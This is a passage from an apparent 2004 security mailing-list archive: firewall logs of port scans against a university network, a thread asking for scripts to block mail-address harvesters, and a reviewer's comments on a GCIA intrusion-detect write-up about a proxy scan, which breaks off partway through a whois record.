******S* Jun 30 12:30:20 81.84.204.39:3598 -> xxx.yyy.254.250:455 SYN ******S* Jun 30 12:30:20 81.84.204.39:3599 -> xxx.yyy.254.251:455 SYN ******S* Jun 30 12:30:20 81.84.204.39:3600 -> xxx.yyy.254.252:455 SYN ******S* Jun 30 12:30:20 81.84.204.39:3602 -> xxx.yyy.254.254:455 SYN ******S* Jun 30 12:30:20 81.84.204.39:3601 -> xxx.yyy.254.253:455 SYN ******S* Jun 30 12:30:20 81.84.204.39:3603 -> xxx.yyy.254.255:455 SYN ******S* 44143 Jun 30 09:53:49 212.106.69.98:2838 -> xxx.yyy.1.1:21 SYN ******S* Jun 30 09:53:49 212.106.69.98:2839 -> xxx.yyy.1.2:21 SYN ******S* Jun 30 09:53:49 212.106.69.98:2840 -> xxx.yyy.1.3:21 SYN ******S* Jun 30 09:53:49 212.106.69.98:2841 -> xxx.yyy.1.4:21 SYN ******S* Jun 30 09:53:49 212.106.69.98:2842 -> xxx.yyy.1.5:21 SYN ******S* Jun 30 09:53:49 212.106.69.98:2843 -> xxx.yyy.1.6:21 SYN ******S* Jun 30 09:53:49 212.106.69.98:2844 -> xxx.yyy.1.7:21 SYN ******S* Jun 30 09:53:49 212.106.69.98:2845 -> xxx.yyy.1.8:21 SYN ******S* [...] Jun 30 10:06:07 212.106.69.98:2062 -> xxx.yyy.255.246:21 SYN ******S* Jun 30 10:06:07 212.106.69.98:2063 -> xxx.yyy.255.247:21 SYN ******S* Jun 30 10:06:07 212.106.69.98:2064 -> xxx.yyy.255.248:21 SYN ******S* Jun 30 10:06:07 212.106.69.98:2065 -> xxx.yyy.255.249:21 SYN ******S* Jun 30 10:06:07 212.106.69.98:2066 -> xxx.yyy.255.250:21 SYN ******S* Jun 30 10:06:07 212.106.69.98:2067 -> xxx.yyy.255.251:21 SYN ******S* Jun 30 10:06:07 212.106.69.98:2068 -> xxx.yyy.255.252:21 SYN ******S* Jun 30 10:06:07 212.106.69.98:2069 -> xxx.yyy.255.253:21 SYN ******S* Jun 30 10:06:07 212.106.69.98:2070 -> xxx.yyy.255.254:21 SYN ******S* 43583 Jun 30 13:11:18 218.103.94.3:3195 -> xxx.yyy.1.1:1433 SYN ******S* Jun 30 13:11:18 218.103.94.3:3196 -> xxx.yyy.1.2:1433 SYN ******S* Jun 30 13:11:18 218.103.94.3:3197 -> xxx.yyy.1.3:1433 SYN ******S* Jun 30 13:11:18 218.103.94.3:3198 -> xxx.yyy.1.4:1433 SYN ******S* Jun 30 13:11:18 218.103.94.3:3199 -> xxx.yyy.1.5:1433 SYN ******S* Jun 30 13:11:18 218.103.94.3:3200 -> xxx.yyy.1.6:1433 SYN ******S* Jun 30 13:11:18 218.103.94.3:3201 -> xxx.yyy.1.7:1433 SYN ******S* Jun 30 13:11:18 218.103.94.3:3202 -> xxx.yyy.1.8:1433 SYN ******S* [...] Jun 30 13:28:14 218.103.94.3:4160 -> xxx.yyy.255.247:1433 SYN ******S* Jun 30 13:28:14 218.103.94.3:4161 -> xxx.yyy.255.248:1433 SYN ******S* Jun 30 13:28:14 218.103.94.3:4162 -> xxx.yyy.255.249:1433 SYN ******S* Jun 30 13:28:14 218.103.94.3:4163 -> xxx.yyy.255.250:1433 SYN ******S* Jun 30 13:28:14 218.103.94.3:4164 -> xxx.yyy.255.251:1433 SYN ******S* Jun 30 13:28:14 218.103.94.3:4165 -> xxx.yyy.255.252:1433 SYN ******S* Jun 30 13:28:14 218.103.94.3:4167 -> xxx.yyy.255.254:1433 SYN ******S* Jun 30 13:28:14 218.103.94.3:4166 -> xxx.yyy.255.253:1433 SYN ******S* 41406 Jun 30 14:42:06 212.76.39.225:4229 -> xxx.yyy.106.130:139 SYN ******S* Jun 30 14:42:06 212.76.39.225:4230 -> xxx.yyy.212.3:139 SYN ******S* Jun 30 14:42:03 212.76.39.225:4236 -> xxx.yyy.229.140:139 SYN ******S* Jun 30 14:42:03 212.76.39.225:4234 -> xxx.yyy.1.1:139 SYN ******S* Jun 30 14:42:03 212.76.39.225:4237 -> xxx.yyy.80.15:139 SYN ******S* Jun 30 14:42:03 212.76.39.225:4238 -> xxx.yyy.185.144:139 SYN ******S* Jun 30 14:42:03 212.76.39.225:4240 -> xxx.yyy.141.148:139 SYN ******S* Jun 30 14:42:06 212.76.39.225:4241 -> xxx.yyy.247.21:139 SYN ******S* [...] Jun 30 22:35:57 212.76.39.225:2357 -> xxx.yyy.166.51:139 SYN ******S* Jun 30 22:35:57 212.76.39.225:2396 -> xxx.yyy.164.77:139 SYN ******S* Jun 30 22:36:00 212.76.39.225:2396 -> xxx.yyy.164.77:139 SYN ******S* Jun 30 22:36:00 212.76.39.225:2406 -> xxx.yyy.252.138:139 SYN ******S* Jun 30 22:36:01 212.76.39.225:2442 -> xxx.yyy.254.112:139 SYN ******S* Jun 30 22:36:04 212.76.39.225:2442 -> xxx.yyy.254.112:139 SYN ******S* Jun 30 22:36:07 212.76.39.225:2539 -> xxx.yyy.168.25:139 SYN ******S* Jun 30 22:36:10 212.76.39.225:2539 -> xxx.yyy.168.25:139 SYN ******S* 37467 Jun 30 10:25:52 211.72.154.170:40168 -> xxx.yyy.1.5:6112 SYN ******S* Jun 30 10:25:52 211.72.154.170:40169 -> xxx.yyy.1.6:6112 SYN ******S* Jun 30 10:25:52 211.72.154.170:40170 -> xxx.yyy.1.7:6112 SYN ******S* Jun 30 10:25:52 211.72.154.170:40171 -> xxx.yyy.1.8:6112 SYN ******S* Jun 30 10:25:52 211.72.154.170:40172 -> xxx.yyy.1.9:6112 SYN ******S* Jun 30 10:25:52 211.72.154.170:40173 -> xxx.yyy.1.10:6112 SYN ******S* Jun 30 10:25:52 211.72.154.170:40174 -> xxx.yyy.1.11:6112 SYN ******S* Jun 30 10:25:52 211.72.154.170:40175 -> xxx.yyy.1.12:6112 SYN ******S* [...] Jun 30 10:29:07 211.72.154.170:48547 -> xxx.yyy.255.75:6112 SYN ******S* Jun 30 10:29:07 211.72.154.170:48548 -> xxx.yyy.255.76:6112 SYN ******S* Jun 30 10:29:07 211.72.154.170:48549 -> xxx.yyy.255.77:6112 SYN ******S* Jun 30 10:29:07 211.72.154.170:48550 -> xxx.yyy.255.78:6112 SYN ******S* Jun 30 10:29:07 211.72.154.170:48551 -> xxx.yyy.255.79:6112 SYN ******S* Jun 30 10:29:07 211.72.154.170:48552 -> xxx.yyy.255.80:6112 SYN ******S* Jun 30 10:29:07 211.72.154.170:48553 -> xxx.yyy.255.81:6112 SYN ******S* Jun 30 10:29:07 211.72.154.170:48554 -> xxx.yyy.255.82:6112 SYN ******S* Jun 30 10:29:07 211.72.154.170:48555 -> xxx.yyy.255.83:6112 SYN ******S* 17780 Jun 30 23:45:07 218.251.42.78:2378 -> xxx.yyy.133.14:5554 SYN ******S* Jun 30 23:45:08 218.251.42.78:2876 -> xxx.yyy.133.14:1023 SYN ******S* Jun 30 23:45:10 218.251.42.78:4020 -> xxx.yyy.133.14:9898 SYN ******S* Jun 30 23:45:07 218.251.42.78:2381 -> xxx.yyy.133.15:5554 SYN ******S* Jun 30 23:45:08 218.251.42.78:2879 -> xxx.yyy.133.15:1023 SYN ******S* Jun 30 23:45:10 218.251.42.78:4026 -> xxx.yyy.133.15:9898 SYN ******S* Jun 30 23:45:07 218.251.42.78:2389 -> xxx.yyy.133.16:5554 SYN ******S* Jun 30 23:45:08 218.251.42.78:2887 -> xxx.yyy.133.16:1023 SYN ******S* [...] Jun 30 23:45:57 218.251.42.78:3603 -> xxx.yyy.153.104:9898 SYN ******S* Jun 30 23:45:57 218.251.42.78:3604 -> xxx.yyy.153.105:9898 SYN ******S* Jun 30 23:45:57 218.251.42.78:3605 -> xxx.yyy.153.106:9898 SYN ******S* Jun 30 23:45:57 218.251.42.78:3606 -> xxx.yyy.153.102:9898 SYN ******S* Jun 30 23:45:57 218.251.42.78:3612 -> xxx.yyy.153.103:9898 SYN ******S* Jun 30 23:45:57 218.251.42.78:3618 -> xxx.yyy.153.107:9898 SYN ******S* Jun 30 23:45:57 218.251.42.78:3626 -> xxx.yyy.153.108:9898 SYN ******S* Jun 30 23:45:57 218.251.42.78:3628 -> xxx.yyy.153.109:9898 SYN ******S* Jun 30 23:45:57 218.251.42.78:3631 -> xxx.yyy.153.110:9898 SYN ******S* 15356 Jun 30 00:56:48 221.192.0.29:4396 -> xxx.yyy.195.88:5554 SYN ******S* Jun 30 00:56:49 221.192.0.29:1717 -> xxx.yyy.195.88:1023 SYN ******S* Jun 30 00:56:51 221.192.0.29:4469 -> xxx.yyy.195.88:9898 SYN ******S* Jun 30 00:56:48 221.192.0.29:4398 -> xxx.yyy.195.89:5554 SYN ******S* Jun 30 00:56:49 221.192.0.29:1737 -> xxx.yyy.195.89:1023 SYN ******S* Jun 30 00:56:51 221.192.0.29:4476 -> xxx.yyy.195.89:9898 SYN ******S* Jun 30 00:56:48 221.192.0.29:4407 -> xxx.yyy.195.91:5554 SYN ******S* Jun 30 00:56:49 221.192.0.29:1739 -> xxx.yyy.195.91:1023 SYN ******S* [...] Jun 30 00:58:00 221.192.0.29:4279 -> xxx.yyy.214.91:9898 SYN ******S* Jun 30 00:58:00 221.192.0.29:4268 -> xxx.yyy.214.84:9898 SYN ******S* Jun 30 00:58:00 221.192.0.29:4385 -> xxx.yyy.214.98:9898 SYN ******S* Jun 30 00:58:01 221.192.0.29:4672 -> xxx.yyy.215.135:9898 SYN ******S* Jun 30 00:58:01 221.192.0.29:4759 -> xxx.yyy.215.144:9898 SYN ******S* Jun 30 00:58:01 221.192.0.29:1801 -> xxx.yyy.215.152:9898 SYN ******S* Jun 30 00:58:01 221.192.0.29:1799 -> xxx.yyy.215.151:9898 SYN ******S* Jun 30 00:58:02 221.192.0.29:2429 -> xxx.yyy.215.209:9898 SYN ******S* 12262 Jun 30 00:56:16 220.202.18.99:2382 -> xxx.yyy.133.14:5554 SYN ******S* Jun 30 00:56:17 220.202.18.99:2651 -> xxx.yyy.133.14:1023 SYN ******S* Jun 30 00:56:19 220.202.18.99:3149 -> xxx.yyy.133.14:9898 SYN ******S* Jun 30 00:56:16 220.202.18.99:2383 -> xxx.yyy.133.15:5554 SYN ******S* Jun 30 00:56:17 220.202.18.99:2671 -> xxx.yyy.133.15:1023 SYN ******S* Jun 30 00:56:19 220.202.18.99:3185 -> xxx.yyy.133.15:9898 SYN ******S* Jun 30 00:56:16 220.202.18.99:2384 -> xxx.yyy.133.16:5554 SYN ******S* Jun 30 00:56:17 220.202.18.99:2672 -> xxx.yyy.133.16:1023 SYN ******S* [...] Jun 30 00:57:39 220.202.18.99:3661 -> xxx.yyy.153.74:9898 SYN ******S* Jun 30 00:57:39 220.202.18.99:3662 -> xxx.yyy.153.75:9898 SYN ******S* Jun 30 00:57:39 220.202.18.99:3663 -> xxx.yyy.153.76:9898 SYN ******S* Jun 30 00:57:39 220.202.18.99:3664 -> xxx.yyy.153.77:9898 SYN ******S* Jun 30 00:57:39 220.202.18.99:3665 -> xxx.yyy.153.78:9898 SYN ******S* Jun 30 00:57:40 220.202.18.99:3991 -> xxx.yyy.153.133:9898 SYN ******S* Jun 30 00:57:40 220.202.18.99:3992 -> xxx.yyy.153.134:9898 SYN ******S* Jun 30 00:57:40 220.202.18.99:3993 -> xxx.yyy.153.135:9898 SYN ******S* Jun 30 00:57:40 220.202.18.99:3994 -> xxx.yyy.153.136:9898 SYN ******S* 12230 Jun 30 00:57:07 61.48.51.171:4593 -> xxx.yyy.174.223:5554 SYN ******S* Jun 30 00:57:08 61.48.51.171:1274 -> xxx.yyy.174.223:1023 SYN ******S* Jun 30 00:57:10 61.48.51.171:2376 -> xxx.yyy.174.223:9898 SYN ******S* Jun 30 00:57:07 61.48.51.171:4592 -> xxx.yyy.174.222:5554 SYN ******S* Jun 30 00:57:08 61.48.51.171:1273 -> xxx.yyy.174.222:1023 SYN ******S* Jun 30 00:57:10 61.48.51.171:2375 -> xxx.yyy.174.222:9898 SYN ******S* Jun 30 00:57:07 61.48.51.171:4594 -> xxx.yyy.174.224:5554 SYN ******S* Jun 30 00:57:08 61.48.51.171:1275 -> xxx.yyy.174.224:1023 SYN ******S* [...] Jun 30 00:58:04 61.48.51.171:2652 -> xxx.yyy.195.39:9898 SYN ******S* Jun 30 00:58:04 61.48.51.171:2654 -> xxx.yyy.195.27:9898 SYN ******S* Jun 30 00:58:04 61.48.51.171:2653 -> xxx.yyy.195.24:9898 SYN ******S* Jun 30 00:58:05 61.48.51.171:2664 -> xxx.yyy.195.42:9898 SYN ******S* Jun 30 00:58:05 61.48.51.171:2687 -> xxx.yyy.195.53:9898 SYN ******S* Jun 30 00:58:05 61.48.51.171:2688 -> xxx.yyy.195.66:9898 SYN ******S* Jun 30 00:58:05 61.48.51.171:2689 -> xxx.yyy.195.74:9898 SYN ******S* Jun 30 00:58:05 61.48.51.171:2693 -> xxx.yyy.195.73:9898 SYN ******S* Jun 30 00:58:05 61.48.51.171:2697 -> xxx.yyy.195.72:9898 SYN ******S* 10955 Jun 30 19:35:39 218.76.57.194:4624 -> xxx.yyy.234.54:3128 SYN ******S* Jun 30 19:35:38 218.76.57.194:4636 -> xxx.yyy.233.8:3128 SYN ******S* Jun 30 19:35:35 218.76.57.194:4642 -> xxx.yyy.134.204:3128 SYN ******S* Jun 30 19:35:38 218.76.57.194:4607 -> xxx.yyy.141.49:3128 SYN ******S* Jun 30 19:35:36 218.76.57.194:4599 -> xxx.yyy.234.8:3128 SYN ******S* Jun 30 19:35:43 218.76.57.194:4669 -> xxx.yyy.15.246:3128 SYN ******S* Jun 30 19:35:44 218.76.57.194:4636 -> xxx.yyy.233.8:3128 SYN ******S* Jun 30 19:35:44 218.76.57.194:4659 -> xxx.yyy.86.95:3128 SYN ******S* [...] Jun 30 23:59:50 218.76.57.194:4436 -> xxx.yyy.184.96:3128 SYN ******S* Jun 30 23:59:51 218.76.57.194:4417 -> xxx.yyy.105.99:3128 SYN ******S* Jun 30 23:59:54 218.76.57.194:4440 -> xxx.yyy.221.113:3128 SYN ******S* Jun 30 23:59:52 218.76.57.194:4442 -> xxx.yyy.175.100:3128 SYN ******S* Jun 30 23:59:52 218.76.57.194:4434 -> xxx.yyy.67.128:3128 SYN ******S* Jun 30 23:59:53 218.76.57.194:4435 -> xxx.yyy.163.44:3128 SYN ******S* Jun 30 23:59:53 218.76.57.194:4436 -> xxx.yyy.184.96:3128 SYN ******S* Jun 30 23:59:58 218.76.57.194:4506 -> xxx.yyy.174.207:3128 SYN ******S* Jun 30 23:59:58 218.76.57.194:4433 -> xxx.yyy.67.128:3128 SYN ******S* 10035 Jun 30 00:56:46 61.55.13.12:2655 -> xxx.yyy.174.225:1023 SYN ******S* Jun 30 00:56:46 61.55.13.12:2649 -> xxx.yyy.174.222:1023 SYN ******S* Jun 30 00:56:46 61.55.13.12:2653 -> xxx.yyy.174.224:1023 SYN ******S* Jun 30 00:56:46 61.55.13.12:2643 -> xxx.yyy.174.223:1023 SYN ******S* Jun 30 00:56:46 61.55.13.12:2666 -> xxx.yyy.174.231:1023 SYN ******S* Jun 30 00:56:46 61.55.13.12:2656 -> xxx.yyy.174.226:1023 SYN ******S* Jun 30 00:56:46 61.55.13.12:2660 -> xxx.yyy.174.227:1023 SYN ******S* Jun 30 00:56:46 61.55.13.12:2665 -> xxx.yyy.174.230:1023 SYN ******S* [...] Jun 30 00:57:39 61.55.13.12:1808 -> xxx.yyy.176.153:1023 SYN ******S* Jun 30 00:57:39 61.55.13.12:1549 -> xxx.yyy.176.144:1023 SYN ******S* Jun 30 00:57:39 61.55.13.12:1824 -> xxx.yyy.176.146:1023 SYN ******S* Jun 30 00:57:39 61.55.13.12:1821 -> xxx.yyy.176.154:1023 SYN ******S* Jun 30 00:57:39 61.55.13.12:1836 -> xxx.yyy.176.158:1023 SYN ******S* Jun 30 00:57:39 61.55.13.12:1862 -> xxx.yyy.176.147:1023 SYN ******S* Jun 30 00:57:41 61.55.13.12:1836 -> xxx.yyy.176.159:9898 SYN ******S* Jun 30 00:57:41 61.55.13.12:4989 -> xxx.yyy.176.126:9898 SYN ******S* Jun 30 00:57:41 61.55.13.12:4969 -> xxx.yyy.176.110:9898 SYN ******S* 8821 Jun 30 00:56:20 219.157.161.122:4970 -> xxx.yyy.153.147:5554 SYN ******S* Jun 30 00:56:21 219.157.161.122:1382 -> xxx.yyy.153.147:1023 SYN ******S* Jun 30 00:56:23 219.157.161.122:1931 -> xxx.yyy.153.147:9898 SYN ******S* Jun 30 00:56:20 219.157.161.122:4972 -> xxx.yyy.153.146:5554 SYN ******S* Jun 30 00:56:21 219.157.161.122:1383 -> xxx.yyy.153.146:1023 SYN ******S* Jun 30 00:56:23 219.157.161.122:1932 -> xxx.yyy.153.146:9898 SYN ******S* Jun 30 00:56:20 219.157.161.122:4979 -> xxx.yyy.153.144:5554 SYN ******S* Jun 30 00:56:21 219.157.161.122:1393 -> xxx.yyy.153.144:1023 SYN ******S* [...] Jun 30 00:58:22 219.157.161.122:1353 -> xxx.yyy.173.250:9898 SYN ******S* Jun 30 00:58:22 219.157.161.122:1364 -> xxx.yyy.173.252:9898 SYN ******S* Jun 30 00:58:22 219.157.161.122:1347 -> xxx.yyy.173.247:9898 SYN ******S* Jun 30 00:58:22 219.157.161.122:1362 -> xxx.yyy.173.251:9898 SYN ******S* Jun 30 00:58:22 219.157.161.122:1352 -> xxx.yyy.173.249:9898 SYN ******S* Jun 30 00:58:22 219.157.161.122:1365 -> xxx.yyy.173.253:9898 SYN ******S* Jun 30 00:58:22 219.157.161.122:1367 -> xxx.yyy.173.255:9898 SYN ******S* Jun 30 00:58:22 219.157.161.122:1370 -> xxx.yyy.174.1:9898 SYN ******S* Jun 30 00:58:22 219.157.161.122:1366 -> xxx.yyy.173.254:9898 SYN ******S* 8656 Jun 30 01:02:46 218.0.205.163:1430 -> xxx.yyy.153.138:5554 SYN ******S* Jun 30 01:02:48 218.0.205.163:1886 -> xxx.yyy.153.138:1023 SYN ******S* Jun 30 01:02:46 218.0.205.163:1442 -> xxx.yyy.153.140:5554 SYN ******S* Jun 30 01:02:46 218.0.205.163:1444 -> xxx.yyy.153.141:5554 SYN ******S* Jun 30 01:02:48 218.0.205.163:1908 -> xxx.yyy.153.141:1023 SYN ******S* Jun 30 01:02:46 218.0.205.163:1449 -> xxx.yyy.153.143:5554 SYN ******S* Jun 30 01:02:48 218.0.205.163:1914 -> xxx.yyy.153.143:1023 SYN ******S* Jun 30 01:02:46 218.0.205.163:1461 -> xxx.yyy.153.145:5554 SYN ******S* [...] Jun 30 01:03:44 218.0.205.163:1764 -> xxx.yyy.155.181:9898 SYN ******S* Jun 30 01:03:44 218.0.205.163:1771 -> xxx.yyy.155.176:9898 SYN ******S* Jun 30 01:03:44 218.0.205.163:1772 -> xxx.yyy.155.182:9898 SYN ******S* Jun 30 01:03:44 218.0.205.163:1784 -> xxx.yyy.155.169:9898 SYN ******S* Jun 30 01:03:44 218.0.205.163:1793 -> xxx.yyy.155.188:9898 SYN ******S* Jun 30 01:03:44 218.0.205.163:1798 -> xxx.yyy.155.175:9898 SYN ******S* Jun 30 01:03:44 218.0.205.163:1824 -> xxx.yyy.155.191:9898 SYN ******S* Jun 30 01:03:44 218.0.205.163:1840 -> xxx.yyy.155.207:9898 SYN ******S* Jun 30 01:03:44 218.0.205.163:1879 -> xxx.yyy.155.198:9898 SYN ******S* 7493 Jun 30 00:57:01 61.177.11.30:3542 -> xxx.yyy.71.160:5554 SYN ******S* Jun 30 00:57:01 61.177.11.30:3552 -> xxx.yyy.71.162:5554 SYN ******S* Jun 30 00:57:01 61.177.11.30:3561 -> xxx.yyy.71.164:5554 SYN ******S* Jun 30 00:57:01 61.177.11.30:3562 -> xxx.yyy.71.165:5554 SYN ******S* Jun 30 00:57:01 61.177.11.30:3596 -> xxx.yyy.71.167:5554 SYN ******S* Jun 30 00:57:01 61.177.11.30:3598 -> xxx.yyy.71.169:5554 SYN ******S* Jun 30 00:57:03 61.177.11.30:4672 -> xxx.yyy.71.169:1023 SYN ******S* Jun 30 00:57:01 61.177.11.30:3599 -> xxx.yyy.71.170:5554 SYN ******S* [...] Jun 30 00:58:39 61.177.11.30:4274 -> xxx.yyy.92.3:9898 SYN ******S* Jun 30 00:58:39 61.177.11.30:4292 -> xxx.yyy.92.23:9898 SYN ******S* Jun 30 00:58:39 61.177.11.30:4356 -> xxx.yyy.89.233:9898 SYN ******S* Jun 30 00:58:39 61.177.11.30:4357 -> xxx.yyy.89.230:9898 SYN ******S* Jun 30 00:58:39 61.177.11.30:4358 -> xxx.yyy.89.236:9898 SYN ******S* Jun 30 00:58:39 61.177.11.30:4359 -> xxx.yyy.89.235:9898 SYN ******S* Jun 30 00:58:39 61.177.11.30:4365 -> xxx.yyy.90.148:9898 SYN ******S* Jun 30 00:58:39 61.177.11.30:4397 -> xxx.yyy.90.174:9898 SYN ******S* Jun 30 00:58:39 61.177.11.30:4599 -> xxx.yyy.89.234:9898 SYN ******S* 6549 -- - Ken =========================================================================== Ken Connelly (KC152) Systems and Operations Manager, ITS - Network Services University of Northern Iowa Cedar Falls, IA 50614-0121 email: Ken.Connelly at uni.edu phone: (319) 273-5850 fax: (319) 273-7373 From mducharme at cybergeneration.com Fri Jul 2 13:58:44 2004 From: mducharme at cybergeneration.com (Maxime Ducharme) Date: Fri, 02 Jul 2004 09:58:44 -0400 Subject: [Intrusions] Increased mail address harvesting References: <200406291140.53260.misch@multinet.de> Message-ID: <016201c4603c$b0aeda90$a900a8c0@cybergeneration.com> Hi Michael, we are experiencing same issue here, about 4-5 domains a day get harvested, our retry queue is always filling up with bogus User unknown bounces. I'd be interested if you know any good scripts. Thanks in advance Maxime Ducharme Programmeur / Sp?cialiste en s?curit? r?seau ----- Original Message ----- From: "Michael Schwartzkopff" To: Sent: Tuesday, June 29, 2004 5:40 AM Subject: [Intrusions] Increased mail address harvesting > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > Hi, > > On my mail server I see an increased harvesting traffic for mail addresses. It > seems that compromised dial-up clients scan for semi-random generated mail > addresses. > > Is there any good script which reads postfix output ("User unknown") and feeds > the firewall accordingly? Thanks. > > - -- > Dr. Michael Schwartzkopff > MultiNET Services GmbH > Bretonischer Ring 7 > 85630 Grasbrunn > > Tel: (+49 89) 456 911 - 0 > Fax: (+49 89) 456 911 - 21 > mob: (+49 174) 343 28 75 > > PGP Fingerprint: F919 3919 FF12 ED5A 2801 DEA6 AA77 57A4 EDD8 979B > > -----BEGIN PGP SIGNATURE----- > Version: GnuPG v1.2.4 (GNU/Linux) > > iD8DBQFA4TkjqndXpO3Yl5sRAnPWAJ9WQPrP8M/mtpsAZ7/R4zOtnqnuYgCfVWet > oqOkexoG4YsXPMRq8X+r9JE= > =E7Sc > -----END PGP SIGNATURE----- > _______________________________________________ > Intrusions mailing list > Intrusions at lists.sans.org > http://www.dshield.org/mailman/listinfo/intrusions > From Donald.Smith at qwest.com Fri Jul 2 14:55:16 2004 From: Donald.Smith at qwest.com (Smith, Donald) Date: Fri, 2 Jul 2004 08:55:16 -0600 Subject: [Intrusions] LOGS: GIAC GCIA Version 3.5 Practical Detect JeremyScott Message-ID: <9921AB57EA49D242A076864C5F473D3C6500D5@itdene2km08.AD.QINTRA.COM> Donald.Smith at qwest.com GCIA I reserve the right to be wrong but don't exercise it too often. > -----Original Message----- > From: intrusions-bounces at lists.sans.org > [mailto:intrusions-bounces at lists.sans.org] On Behalf Of > jscott at rolenstarsupply.com > Sent: Thursday, July 01, 2004 4:55 PM > To: intrusions at incidents.org > Subject: [Intrusions] LOGS: GIAC GCIA Version 3.5 Practical > Detect JeremyScott > > Not very much detail. It makes it harder later to draw conclusions. > Network Detect 2: Proxy scan > > > Jun 20 00:00:00 tcp 216.232.9.229(1422) > xxx.xxx.xxx.231(3127), denied > > Jun 20 00:00:06 tcp 220.99.138.166(4867) > xxx.xxx.xxx.35(3127), denied > > Jun 20 00:00:08 tcp 220.99.138.166(4738) > xxx.xxx.xxx.37(3127), denied > > Jun 20 00:00:08 icmp 217.88.124.253 > xxx.xxx.xxx.221 denied > > Jun 20 00:00:14 tcp 220.99.138.166(3208) > xxx.xxx.xxx.35(3128), denied > > Jun 20 00:00:16 tcp 216.232.9.229(1690) > xxx.xxx.xxx.231(1080), denied > > > > 1. Source of Trace: > > > This was taken from the external router log produced on my > company network. Our intrusion detection is within the > external router; therefore, no other logs are available to > correlate the data. The internal IP addresses have been > obfuscated for security reasons. > > > > 2. Detect was generated by: > > > Self observation of the external router logs pulled on a > daily basis. Looking at the logs for signs of malicious > behavior by hand can be tedious but there can also be a > wealth of knowledge in what is happening just outside your > border. Here is a compiled example of the scan: > > > > Access Attempts logged By MY_ROUTER > > Mon Day Time Type Source Address (Port) > Destination Address (Port) > > --- -- > > Jun 20 00:00:06 tcp 220.99.138.166(4867) > xxx.xxx.xxx.35(3127), denied > > Jun 20 00:00:06 tcp 220.99.138.166(4867) > xxx.xxx.xxx.35(3127), denied > > Jun 20 00:00:06 tcp 220.99.138.166(4867) > xxx.xxx.xxx.35(3127), denied > > Jun 20 00:00:22 tcp 220.99.138.166(3486) > xxx.xxx.xxx.35(1080), denied > > Jun 20 00:00:40 tcp 220.99.138.166(4068) > xxx.xxx.xxx.36(3128), denied > > Jun 20 00:01:01 tcp 220.99.138.166(4738) > xxx.xxx.xxx.37(3127), denied > > Jun 20 00:01:28 tcp 220.99.138.166(3825) > xxx.xxx.xxx.40(3128), denied > > Jun 20 00:01:36 tcp 220.99.138.166(4105) > xxx.xxx.xxx.40(1080), denied > > Jun 20 00:01:44 tcp 220.99.138.166(4382) > xxx.xxx.xxx.41(3127), denied > > Jun 20 00:01:52 tcp 220.99.138.166(4869) > xxx.xxx.xxx.41(3128), denied > > Jun 20 00:01:58 tcp 220.99.138.166(3825) > xxx.xxx.xxx.40(3128), denied > > Jun 20 00:02:04 tcp 220.99.138.166(4105) > xxx.xxx.xxx.40(1080), denied > > Jun 20 00:02:24 tcp 220.99.138.166(3209) > xxx.xxx.xxx.41(1080), denied > > Jun 20 00:02:40 tcp 220.99.138.166(3507) > xxx.xxx.xxx.42(3127), denied > > Jun 20 00:02:53 tcp 220.99.138.166(4053) > xxx.xxx.xxx.42(1080), denied > > Jun 20 00:03:02 tcp 220.99.138.166(4326) > xxx.xxx.xxx.43(3127), denied Look at the source and dst ports notice anything? There appears to be some "near" matches (1st and forth digit matching. > > Jun 20 00:03:04 tcp 220.99.138.166(3698) > xxx.xxx.xxx.44(3128), denied > > Jun 20 00:03:11 tcp 220.99.138.166(4727) > xxx.xxx.xxx.43(3128), denied > > Jun 20 00:03:16 tcp 220.99.138.166(3427) > xxx.xxx.xxx.44(3127), denied > > Jun 20 00:03:28 tcp 220.99.138.166(3698) > xxx.xxx.xxx.44(3128), denied > > Jun 20 00:03:33 tcp 220.99.138.166(3970) > xxx.xxx.xxx.44(1080), denied > > Jun 20 00:03:52 tcp 220.99.138.166(4247) > xxx.xxx.xxx.45(3127), denied > > Jun 20 00:04:00 tcp 220.99.138.166(4629) > xxx.xxx.xxx.45(3128), denied > > Jun 20 00:04:17 tcp 220.99.138.166(3345) > xxx.xxx.xxx.46(3127), denied > > Jun 20 00:04:30 tcp 220.99.138.166(3902) > xxx.xxx.xxx.46(1080), denied > > Jun 20 00:04:37 tcp 220.99.138.166(4176) > xxx.xxx.xxx.47(3127), denied > > Jun 20 00:04:48 tcp 220.99.138.166(4969) > xxx.xxx.xxx.47(1080), denied > > Jun 20 00:05:04 tcp 220.99.138.166(3554) > xxx.xxx.xxx.48(3128), denied > > > > 3. Probability the source address was spoofed: > > > Since there were no other logs to correlate the data to, I > can't tell if the packets have any signs of crafting. > However, because of the ports that are being scanned the > source address is probably real. Headers would be helpful! > > > > Source Address - The source address is 220.99.138.166. If > you do a whois on the IP address, you will be returned with > the following information from APNIC. > Very difficult to read you might want to reformat. It was all run together before I responded. > > > % [whois.apnic.net node-1]% Whois data copyright terms > http://www.apnic.net/db/dbcopyright.htmlinetnum: > 220.96.0.0 - 220.99.255.255netname: OCN-JPNIC-JPdescr: > OCN Provided By NTT-Communications which is ISPdescr: > in Chiyoda-ku, Tokyo, Japancountry: JPadmin-c: > JNIC1-APtech-c: JNIC1-APremarks: > ************************************************remarks: > Allocated to JPNIC member. Authoritativeremarks: > information regarding assignments and allocationremarks: > made from within this block can also be queriedremarks: > at whois.nic.ad.jp. To obtain an English outputremarks: > query whois -h whois.nic.ad.jp x.x.x.x/eremarks: Email > address for spam or abuse complaints : > abuse at ocn.ad.jpremarks: > ************************************************mnt-by: > MAINT-JPNICmnt-lower: MAINT-JPNICchanged: > hm-changed at apnic.net 20020904changed: ip-apnic at nic.ad.jp > 20040413status: ALLOCATED PORTABLEsource: > APNICrole: Japan Network Information Centeraddress: > Kokusai-Kougyou-Kanda Bldg 6F, 2-3-4 Uchi-Kandaaddress: > Chiyoda-ku, Tokyo 101-0047, Japancountry: JPphone: > +81-3-5297-2311fax-no: +81-3-5297-2312e-mail: > hostmaster at nic.ad.jpadmin-c: SS13-APtech-c: > SY7-APnic-hdl: JNIC1-APmnt-by: MAINT-JPNICchanged: > apnic-ftp at nic.ad.jp 19990629changed: > ip-staff at nic.ad.jp 20030806source: APNICinetnum: > 220.99.128.0 - 220.99.255.255netname: PLALAdescr: > Plala Networks Inc.country: JPadmin-c: > MN2905JPtech-c: HS3694JPremarks: This information > has been partially mirrored by APNIC fromremarks: JPNIC. > To obtain more specific information, please use theremarks: > JPNIC whois server at whois.nic.ad.jp. (This defaults > toremarks: Japanese output, use the /e switch for > English output)changed: apnic-ftp at nic.ad.jp > 20030203remarks: This information has been partially > mirrored by APNIC fromremarks: JPNIC. To obtain more > specific information, 